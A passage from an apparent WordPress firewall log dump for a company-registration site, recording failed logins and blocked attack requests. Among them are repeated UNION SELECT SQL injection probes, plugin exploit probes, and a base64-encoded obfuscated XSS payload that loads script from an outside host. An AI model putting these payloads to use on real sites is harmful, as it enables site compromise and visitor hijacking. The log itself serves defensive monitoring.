Safari/537.36','lostPassword',NULL,NULL),(8015,0.000000,1564678400.415456,'\0\0\0\0\0\0\0\0\0\0f\0',0,200,0,0,0,'https://companyregistration.online/sa-company-registration/','https://companyregistration.online/sa-company-registration/','Mozilla/5.0 (Linux; Android 7.0; BND-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Mobile Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8016,0.000000,1564678682.133589,'\0\0\0\0\0\0\0\0\0\0f\0',0,200,0,0,0,'https://companyregistration.online/sa-company-registration/','https://companyregistration.online/sa-company-registration/','Mozilla/5.0 (Linux; Android 7.0; BND-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Mobile Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8017,0.000000,1564678688.569802,'\0\0\0\0\0\0\0\0\0\0f\0',0,200,0,0,0,'https://companyregistration.online/sa-company-registration/','https://companyregistration.online/sa-company-registration/','Mozilla/5.0 (Linux; Android 7.0; BND-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Mobile Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8018,0.000000,1564678720.190354,'\0\0\0\0\0\0\0\0\0\0f\0',0,200,0,0,0,'https://companyregistration.online/my-account/lost-password/','https://companyregistration.online/my-account/lost-password/','Mozilla/5.0 (Linux; Android 7.0; BND-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Mobile Safari/537.36','lostPassword',NULL,NULL),(8019,1564682573.543911,1564682572.846000,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8127,1564715929.304992,1564715928.969100,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C49%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDU1LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Niw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTcsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ4LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MCw0OSw0NSw4MSw0NSkgLS0gLyogb3JkZXIgYnkgJ2FzIC8q\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8020,1564682572.065932,1564682571.580100,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8021,1564682570.815056,1564682570.321700,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8022,1564682569.353493,1564682568.832600,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8023,1564682568.091740,1564682567.644300,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8024,1564682566.945041,1564682566.423100,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8025,1564682565.669757,1564682565.222900,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8026,1564682564.467450,1564682563.924000,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8128,1564715927.840054,1564715927.526700,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C48%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDU1LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Niw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTcsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ4LDQ1LDgxLDQ1KSAtLSAvKiBvcmRlciBieSAnYXMgLyo=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8027,1564682563.019368,1564682562.499100,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?page=yuzo-related-post',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Related Posts <= 5.12.90 - Missing Authentication','{\"learningMode\":0,\"failedRules\":\"137\",\"paramKey\":\"cmVxdWVzdC5ib2R5W25hbWVfb3B0aW9uc10=\",\"paramValue\":\"eXV6b19yZWxhdGVkX3Bvc3Q=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(8129,1564715926.398309,1564715925.994500,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C57%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDU1LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Niw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTcsNDUsODEsNDUpIC0tIC8qIG9yZGVyIGJ5ICdhcyAvKg==\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8028,1564682561.651021,1564682561.135800,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8130,1564715924.852727,1564715924.551600,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C56%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDU1LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Niw0NSw4MSw0NSkgLS0gLyogb3JkZXIgYnkgJ2FzIC8q\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8029,1564682560.370902,1564682559.896700,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8030,1564682558.765608,1564682558.160600,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php?action=update_zb_fbc_code',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2RvbWFpbl0=\",\"paramValue\":\"PC9zY3JpcHQ+PHNjcmlwdCAgYXN5bmM9dHJ1ZSB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBudCA9IFN0cmluZy5mcm9tQ2hhckNvZGUoOTgsMTAxLDExNCwxMTYsNTQpO3ZhciBtYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoOTcsIDEwNiwgOTcsIDEyMCwgNjcsIDExMSwgMTE3LCAxMTAsIDExNiwgMTAxLCAxMTQpO3ZhciBzYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTE1LCA5OSwgMTE0LCAxMDUsIDExMiwgMTE2KTt2YXIgamIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwNCwgMTE2LCAxMTYsIDExMiwgMTE1LCA1OCwgNDcsIDQ3KTsgdmFyIHRiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTYsIDEwMSwgMTIwLCAxMTYsIDQ3LCAxMDYsIDk3LCAxMTgsIDk3LCAxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBsYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTAzLDk3LDk4LDExNCwxMDUsMTAxLDEwOCwxMDgsOTcsMTA4LDExMSwxMTgsMTAxLDk5LDk3LDExNiwxMTUsNDYsOTksMTExLDEwOSw0NywxMDgsMTExLDExMCwxMDEsNDYsMTA2LDExNSw2MywxMjIsMTExLDExMCwxMDEsMTA1LDEwMCw2MSw1Niw1Nyw1NCw1Myw1Miw1MSw1MCwzOCwxMTcsMTE2LDEwOSw5NSw5OSw2MSw1MiwzOCwxMDksMTE0LDExMSw2MSk7dmFyIGM9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudChzYik7Yy50eXBlPXRiLGMuYXN5bmM9MSxjLnNyYz1qYitsYitudDt2YXIgbj1kb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZShzYilbMF07bi5wYXJlbnROb2RlLmluc2VydEJlZm9yZShjLG4pOzwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8131,1564715922.338776,1564715921.961200,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C55%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUi